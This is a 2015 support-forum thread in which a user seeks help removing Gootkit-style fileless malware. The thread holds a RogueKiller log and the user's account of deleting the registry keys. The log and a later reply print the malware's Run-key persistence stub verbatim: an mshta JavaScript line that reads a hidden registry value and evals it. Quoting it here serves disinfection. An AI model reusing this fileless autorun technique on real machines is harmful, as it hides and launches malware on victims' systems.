Author Topic: RK Can't remove Tr.Gootkit registry entries - c0000034  (Read 5728 times)

0 Members and 2 Guests are viewing this topic.

August 25, 2015, 04:50:06 PM

NuConcept

  • Newbie

  • Offline
  • *

  • 3
  • Reputation:
    0
    • View Profile
RK Can't remove Tr.Gootkit registry entries - c0000034
« on: August 25, 2015, 04:50:06 PM »
No idea how this junk got on my machine, Been there since last week apparently since my two weeks ago history does not contain the slew of websites I'm apparently visiting without my knowledge.  I'm guessing it was the result of a mis-click in Twitter that opened up one of those junk websites with the gallery-style stuff. 

Whether this is my only problem of not isn't really my issue right now, my issue is these registry entries which will not go away.  I don't like things that can't be removed.  Tried manual, frst64, and RK.  All three give some variant of a c0000034 error.

Attached is a portion of my IE History today with the rouge behavior opened up (Note there are no visuals to go with this history) and below is the export from the RougeKiller app showing the failure to remove the keys.

Appreciate any insight into removing these registry keys as I've scoured and can't find an answer not involving the software I've already used.

RogueKiller V10.10.2.0 [Aug 24 2015] by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/softwares/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : mnewmark [Administrator]
Started from : C:\Users\mnewmark\Desktop\RogueKiller.exe
Mode : Delete -- Date : 08/25/2015 10:10:48

¤¤¤ Processes : 0 ¤¤¤

¤¤¤ Registry : 5 ¤¤¤
[Tr.Gootkit] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run | 3bd3bbe4 : mshta javascript:RXn9nR8A="R5Qlce36";ZO6=new%20ActiveXObject("WScript.Shell");szp3XXFGt="t";iK43kx=ZO6.RegRead("HKLM\\software\\Wow6432Node\\8c5470f52d\\e8128134");XM5uAlX5tN="Gn";eval(iK43kx);zuCUu7Ak7="C47";
  • -> ERROR [c0000034]
[Tr.Gootkit] (X64) HKEY_USERS\S-1-5-21-1330083092-1246176775-4547331-8996\Software\Microsoft\Windows\CurrentVersion\Run | 3bd3bbe4 : mshta javascript:JqRl16HFbN="hYwnAH";k65V=new%20ActiveXObject("WScript.Shell");fO0RTHM="xfZtIVugO";a6HJe=k65V.RegRead("HKCU\\software\\8c5470f52d\\e8128134");jLW7dYt="lS9S";eval(a6HJe);ibKpo0i="H1UmWJZ";
  • -> ERROR [c0000034]
[Tr.Gootkit] (X86) HKEY_USERS\S-1-5-21-1330083092-1246176775-4547331-8996\Software\Microsoft\Windows\CurrentVersion\Run | 3bd3bbe4 : mshta javascript:JqRl16HFbN="hYwnAH";k65V=new%20ActiveXObject("WScript.Shell");fO0RTHM="xfZtIVugO";a6HJe=k65V.RegRead("HKCU\\software\\8c5470f52d\\e8128134");jLW7dYt="lS9S";eval(a6HJe);ibKpo0i="H1UmWJZ";
  • -> ERROR [c0000034]
[Tr.Gootkit] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | a175e83b : mshta javascript:JGAhca98="W";fR8=new%20ActiveXObject("WScript.Shell");Ht3OEjnc="OHFmj";r3u8hk=fR8.RegRead("HKLM\\software\\Wow6432Node\\8c5470f52d\\e8128134");BtlqKk48="UgEm";eval(r3u8hk);ZLFEU2KJ6="szH6jjYJn";
  • -> ERROR [c0000034]
[Tr.Gootkit] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | a175e83b : mshta javascript:JGAhca98="W";fR8=new%20ActiveXObject("WScript.Shell");Ht3OEjnc="OHFmj";r3u8hk=fR8.RegRead("HKLM\\software\\Wow6432Node\\8c5470f52d\\e8128134");BtlqKk48="UgEm";eval(r3u8hk);ZLFEU2KJ6="szH6jjYJn";
  • -> ERROR [c0000034]


¤¤¤ Tasks : 0 ¤¤¤

¤¤¤ Files : 0 ¤¤¤

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Not loaded [0xc000036b]) ¤¤¤

¤¤¤ Web browsers : 0 ¤¤¤

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: ST320LT009-9WC142 +++++
--- User ---
[MBR] 0f9cd6a0e04d9b71ef0091cb9181989e
[BSP] 422ad3b656dc885c47c094f585cdf096 : HP|VT.Unknown MBR Code
Partition table:
0 - [XXXXXX] DELL-UTIL (0xde) [VISIBLE] Offset (sectors): 63 | Size: 39 MB
1 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 81920 | Size: 752 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
2 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 1622016 | Size: 304452 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK


Reply #1August 25, 2015, 05:49:06 PM

NuConcept

  • Newbie

  • Offline
  • *

  • 3
  • Reputation:
    0
    • View Profile
Re: RK Can't remove Tr.Gootkit registry entries - c0000034
« Reply #1 on: August 25, 2015, 05:49:06 PM »
Ran Malwarebytes program which also detected Rootkit.Fileless.MTGen in the registry, but contrary to what it told me, it did NOT in fact remove the registry entries.  Cleared IE history, browsed here, and there are already 4 websites with multiple page opens that I did not do.  Figured it hadn't been removed when I opened REGEDIT and it told me it couldn't display the key in the HKCU.....Run section (c0000034).

Going to look up "Rootkit.Fileless.MTGen" see if I can figure it out, in the meanwhile, any help would be appreciated. :)

Reply #2August 25, 2015, 08:09:30 PM

NuConcept

  • Newbie

  • Offline
  • *

  • 3
  • Reputation:
    0
    • View Profile
Re: RK Can't remove Tr.Gootkit registry entries - c0000034
« Reply #2 on: August 25, 2015, 08:09:30 PM »
UPDATE -
Tried CCleaner which didn't even detect the invalid keys.  A note on CCleaner this particular bug prevented it's installation.  There were several REGSERVER32.EXE processes running which had to be killed.  Once killed the program installed properly.

Upon a restart, the system was running MSHTA.EXE and firing off some PowerShell scripts quickly to get itself started.  Killing the REGSERVER32.EXE processes after it ran seemed to stop it from functioning.

I was finally able to eliminate the following invalid registry entries using Registry Workshop which I downloaded from Torchsoft.  I was not able to directly delete or edit the entries, but they were visible in the interface and I could get the complete text.  Because the value name appeared to be NULL, it couldn't be affected.  However unlike the built-in REGEDIT, this software WAS able to completely remove the RUN key.  I only had valid entries in one of the four, so I moved them out to RunOnce, deleted the key, recreated the key, and moved them back.  (FYI The HKCU run key was automatically recreated by the system after I deleted it).

End result here is if you find yourself with a registry key that cannot be removed by any of the generally used programs (Malwarebyes, FRST64, RougeKiller) - give Registry Workshop a look.

I'm fairly satisfied the issue is removed, all of the scanners say I'm clean and I see nothing fishy.  If that changes, I'll provide another update.

Here were the keys removed and below is the full text from one of them:

HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN|^a175e83b, , [4fba7994f19a95a1a4f18a1da55fbe42],

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN|^a175e83b, , [a762e62799f292a4eaabaef942c21ee2],

HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|^3bd3bbe4, , [b158d6377f0c191d7bfb7e298381c739],

HKU\S-1-5-21-1330083092-1246176775-4547331-8996\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|^3bd3bbe4, , [43c667a6bfcc78be1560a4032cd840c0],

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
@="mshta javascript:JqRl16HFbN=\"hYwnAH\";k65V=new%20ActiveXObject(\"WScript.Shell\");fO0RTHM=\"xfZtIVugO\";a6HJe=k65V.RegRead(\"HKCU\\\\software\\\\8c5470f52d\\\\e8128134\");jLW7dYt=\"lS9S\";eval(a6HJe);ibKpo0i=\"H1UmWJZ\";"

Reply #3August 25, 2015, 08:49:16 PM

Curson

  • Global Moderator
  • Hero Member

  • Offline
  • *****

  • 2809
  • Reputation:
    100
    • View Profile
Re: RK Can't remove Tr.Gootkit registry entries - c0000034
« Reply #3 on: August 25, 2015, 08:49:16 PM »
Hi NuConcept,

Welcome to Adlice.com Forum.

The report you posted was generated with the 32 bits version of RogueKiller.
Please download RogueKiller (64 bits version), redo a full scan and post the report obtained in your next reply.

Regards.